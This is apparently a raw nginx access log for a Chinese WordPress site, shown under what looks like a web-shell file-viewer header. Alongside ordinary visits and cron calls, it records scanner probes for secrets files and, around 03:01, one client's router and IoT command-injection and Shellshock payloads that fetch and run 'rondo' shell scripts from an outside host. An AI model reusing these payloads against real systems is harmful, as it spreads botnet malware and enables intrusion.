HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: //home/logs/cqqizhou_access_2025-09-24.log
202.47.135.196 - - [24/Sep/2025:00:00:01 +0800] "GET /.env.bak HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:01 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:02 +0800] "GET /config/aws.yml HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:04 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:04 +0800] "GET /_profiler/phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:05 +0800] "GET /.env.dev.local HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:06 +0800] "GET /infos.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:10 +0800] "GET /php_info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:10 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:12 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:13 +0800] "GET /configuration.php-dist HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:14 +0800] "GET /.config HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:15 +0800] "GET /config.json HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:17 +0800] "GET /debug/default/view?panel=config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:19 +0800] "GET /web/debug/default/view?panel=config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:20 +0800] "GET /frontend/web/debug/default/view?panel=config HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:21 +0800] "GET /_ignition/health-check HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.196 - - [24/Sep/2025:00:00:22 +0800] "GET /.circleci/config.yml HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
36.133.115.36 - - [24/Sep/2025:00:01:03 +0800] "POST /wp-cron.php?doing_wp_cron=1758643263.2181980609893798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.87.31.179 - - [24/Sep/2025:00:01:03 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F)"
34.87.31.179 - - [24/Sep/2025:00:01:05 +0800] "GET /wordpress/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F)"
36.133.115.36 - - [24/Sep/2025:00:18:08 +0800] "POST /wp-cron.php?doing_wp_cron=1758644288.9442460536956787109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.16 - - [24/Sep/2025:00:18:09 +0800] "GET /?s=2025 HTTP/1.1" 200 19412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [24/Sep/2025:00:23:21 +0800] "POST /wp-cron.php?doing_wp_cron=1758644601.3416860103607177734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.96.24.54 - - [24/Sep/2025:00:23:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
119.96.24.54 - - [24/Sep/2025:00:23:29 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:00:24:56 +0800] "POST /wp-cron.php?doing_wp_cron=1758644696.8014829158782958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [24/Sep/2025:00:24:57 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [24/Sep/2025:00:38:18 +0800] "POST /wp-cron.php?doing_wp_cron=1758645498.4872839450836181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
154.23.176.120 - - [24/Sep/2025:00:38:18 +0800] "GET /?author=1 HTTP/1.1" 200 19419 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [24/Sep/2025:00:38:22 +0800] "POST /wp-cron.php?doing_wp_cron=1758645501.9744949340820312500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
154.23.176.120 - - [24/Sep/2025:00:38:22 +0800] "GET / HTTP/1.1" 301 5 "http://36.133.115.36" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13"
154.23.176.120 - - [24/Sep/2025:00:38:22 +0800] "GET / HTTP/1.1" 301 5 "http://36.133.115.36" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13"
154.23.176.120 - - [24/Sep/2025:00:38:23 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13"
36.133.115.36 - - [24/Sep/2025:00:45:16 +0800] "POST /wp-cron.php?doing_wp_cron=1758645916.3229908943176269531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [24/Sep/2025:00:45:16 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.158.91.254 - - [24/Sep/2025:00:45:40 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Agency/93.8.2357.5"
93.158.91.235 - - [24/Sep/2025:00:45:41 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Agency/93.8.2357.5"
36.133.115.36 - - [24/Sep/2025:00:59:39 +0800] "POST /wp-cron.php?doing_wp_cron=1758646779.6626849174499511718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [24/Sep/2025:00:59:39 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [24/Sep/2025:01:03:38 +0800] "POST /wp-cron.php?doing_wp_cron=1758647017.9774858951568603515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
167.71.69.173 - - [24/Sep/2025:01:03:38 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
205.169.39.11 - - [24/Sep/2025:01:19:24 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
36.133.115.36 - - [24/Sep/2025:01:20:02 +0800] "POST /wp-cron.php?doing_wp_cron=1758648002.1743600368499755859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.26.193 - - [24/Sep/2025:01:20:02 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:01:32:06 +0800] "POST /wp-cron.php?doing_wp_cron=1758648726.2751669883728027343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.52.250 - - [24/Sep/2025:01:32:06 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.52.250 - - [24/Sep/2025:01:32:07 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:01:35:26 +0800] "POST /wp-cron.php?doing_wp_cron=1758648926.1084771156311035156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.173.1.69 - - [24/Sep/2025:01:35:26 +0800] "GET /contacts/ HTTP/1.1" 200 18531 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:01:39:21 +0800] "POST /wp-cron.php?doing_wp_cron=1758649161.4448699951171875000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [24/Sep/2025:01:39:21 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [24/Sep/2025:01:44:57 +0800] "POST /wp-cron.php?doing_wp_cron=1758649497.5036020278930664062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
104.248.45.30 - - [24/Sep/2025:01:44:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
43.131.243.61 - - [24/Sep/2025:01:45:01 +0800] "GET /news/ HTTP/1.1" 200 19414 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
115.159.33.43 - - [24/Sep/2025:01:45:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [24/Sep/2025:01:57:00 +0800] "POST /wp-cron.php?doing_wp_cron=1758650220.7066409587860107421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.72.93 - - [24/Sep/2025:01:57:00 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 200 17614 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:02:05:51 +0800] "POST /wp-cron.php?doing_wp_cron=1758650751.1192409992218017578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.48.240 - - [24/Sep/2025:02:05:51 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840 HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:02:16:14 +0800] "POST /wp-cron.php?doing_wp_cron=1758651374.1627449989318847656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.164.197.224 - - [24/Sep/2025:02:16:14 +0800] "GET /wp-content/uploads/2025/07/1753456770- HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:02:18:08 +0800] "POST /wp-cron.php?doing_wp_cron=1758651488.2727789878845214843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [24/Sep/2025:02:18:09 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
36.133.115.36 - - [24/Sep/2025:02:24:58 +0800] "POST /wp-cron.php?doing_wp_cron=1758651898.4237129688262939453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.11.6 - - [24/Sep/2025:02:24:58 +0800] "GET /portfolio/%e5%86%b7%e8%bd%a7%e6%9d%bf/ HTTP/1.1" 200 18720 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:02:27:39 +0800] "POST /wp-cron.php?doing_wp_cron=1758652059.4587750434875488281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [24/Sep/2025:02:27:39 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [24/Sep/2025:02:34:39 +0800] "POST /wp-cron.php?doing_wp_cron=1758652479.4954700469970703125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.172.39 - - [24/Sep/2025:02:34:39 +0800] "GET /services/ HTTP/1.1" 200 19769 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:02:47:29 +0800] "POST /wp-cron.php?doing_wp_cron=1758653249.6823670864105224609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.62.101 - - [24/Sep/2025:02:47:29 +0800] "GET /business/ HTTP/1.1" 200 18232 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:02:55:20 +0800] "POST /wp-cron.php?doing_wp_cron=1758653720.1397180557250976562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.76.247 - - [24/Sep/2025:02:55:20 +0800] "GET /bug HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.76.247 - - [24/Sep/2025:02:55:26 +0800] "GET /bug/ HTTP/1.1" 200 11682 "http://cqqizhou.com/bug" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.88.186.32 - - [24/Sep/2025:03:01:53 +0800] "GET /goform/webRead/open/?path=%7Cwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wtf.sh%7Csh HTTP/1.0" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [24/Sep/2025:03:01:53 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
36.133.115.36 - - [24/Sep/2025:03:01:53 +0800] "POST /wp-cron.php?doing_wp_cron=1758654113.7460429668426513671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.88.186.32 - - [24/Sep/2025:03:01:54 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - ffadmin [24/Sep/2025:03:01:55 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/apply.cgi" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - ffadmin [24/Sep/2025:03:01:55 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/apply.cgi" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [24/Sep/2025:03:01:55 +0800] "POST /apply_sec.cgi HTTP/1.1" 499 0 "http://36.133.115.36/login_pic.asp" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - root [24/Sep/2025:03:01:55 +0800] "POST /dvr/cmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - root [24/Sep/2025:03:01:56 +0800] "POST /cn/cmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [24/Sep/2025:03:01:56 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& #Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [24/Sep/2025:03:01:56 +0800] "POST /goform/SystemCommand HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [24/Sep/2025:03:01:56 +0800] "GET /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [24/Sep/2025:03:01:57 +0800] "POST /editBlackAndWhiteList HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [24/Sep/2025:03:01:57 +0800] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 499 0 "http://36.133.115.36/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [24/Sep/2025:03:02:00 +0800] "POST /goform/Mail_Test HTTP/1.0" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [24/Sep/2025:03:02:02 +0800] "GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS} HTTP/1.0" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [24/Sep/2025:03:02:02 +0800] "GET /HNAP1/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [24/Sep/2025:03:02:03 +0800] "POST /goform/sysTools HTTP/1.1" 499 0 "http://36.133.115.36/adm/systools.asp" "Mozilla/5.0 (bang2012@protonmail.com)"
36.133.115.36 - - [24/Sep/2025:03:03:21 +0800] "POST /wp-cron.php?doing_wp_cron=1758654200.9652481079101562500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
172.202.118.46 - - [24/Sep/2025:03:03:21 +0800] "GET /hudson HTTP/1.1" 404 8990 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [24/Sep/2025:03:05:33 +0800] "POST /wp-cron.php?doing_wp_cron=1758654332.9822700023651123046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.106.18 - - [24/Sep/2025:03:05:33 +0800] "GET /club/ HTTP/1.1" 200 11904 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:03:05:55 +0800] "POST /wp-cron.php?doing_wp_cron=1758654354.9945929050445556640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.167.217.137 - - [24/Sep/2025:03:05:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [24/Sep/2025:03:15:53 +0800] "POST /wp-cron.php?doing_wp_cron=1758654953.1893389225006103515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.110 - - [24/Sep/2025:03:15:53 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [24/Sep/2025:03:16:48 +0800] "POST /wp-cron.php?doing_wp_cron=1758655008.6804299354553222656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.159.143.190 - - [24/Sep/2025:03:16:48 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fportfolio%2F%25e5%2586%25b7%25e8%25bd%25a7%25e6%259d%25bf%2F HTTP/1.1" 200 1218 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:03:19:21 +0800] "POST /wp-cron.php?doing_wp_cron=1758655161.7624249458312988281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.203.57.3 - - [24/Sep/2025:03:19:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [24/Sep/2025:03:20:39 +0800] "POST /wp-cron.php?doing_wp_cron=1758655239.4862689971923828125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.180.140.13 - - [24/Sep/2025:03:20:39 +0800] "GET /login/login HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.140.138 - - [24/Sep/2025:03:20:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
36.133.115.36 - - [24/Sep/2025:03:35:49 +0800] "POST /wp-cron.php?doing_wp_cron=1758656149.2742059230804443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.67.21 - - [24/Sep/2025:03:35:49 +0800] "GET /process/processing HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.67.21 - - [24/Sep/2025:03:35:53 +0800] "GET /services/processing/ HTTP/1.1" 200 18888 "http://cqqizhou.com/process/processing" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.106.18 - - [24/Sep/2025:03:50:27 +0800] "GET /wp-content/uploads/2025/07/1753455746-DSC01472-768x432.webp HTTP/1.1" 200 31096 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Sep/2025:03:57:11 +0800] "POST /wp-cron.php?doing_wp_cron=1758657431.6221399307250976562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [24/Sep/2025:03:57:11 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [24/Sep/2025:03:58:27 +0800] "POST /wp-cron.php?doing_wp_cron=1758657507.4235179424285888671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
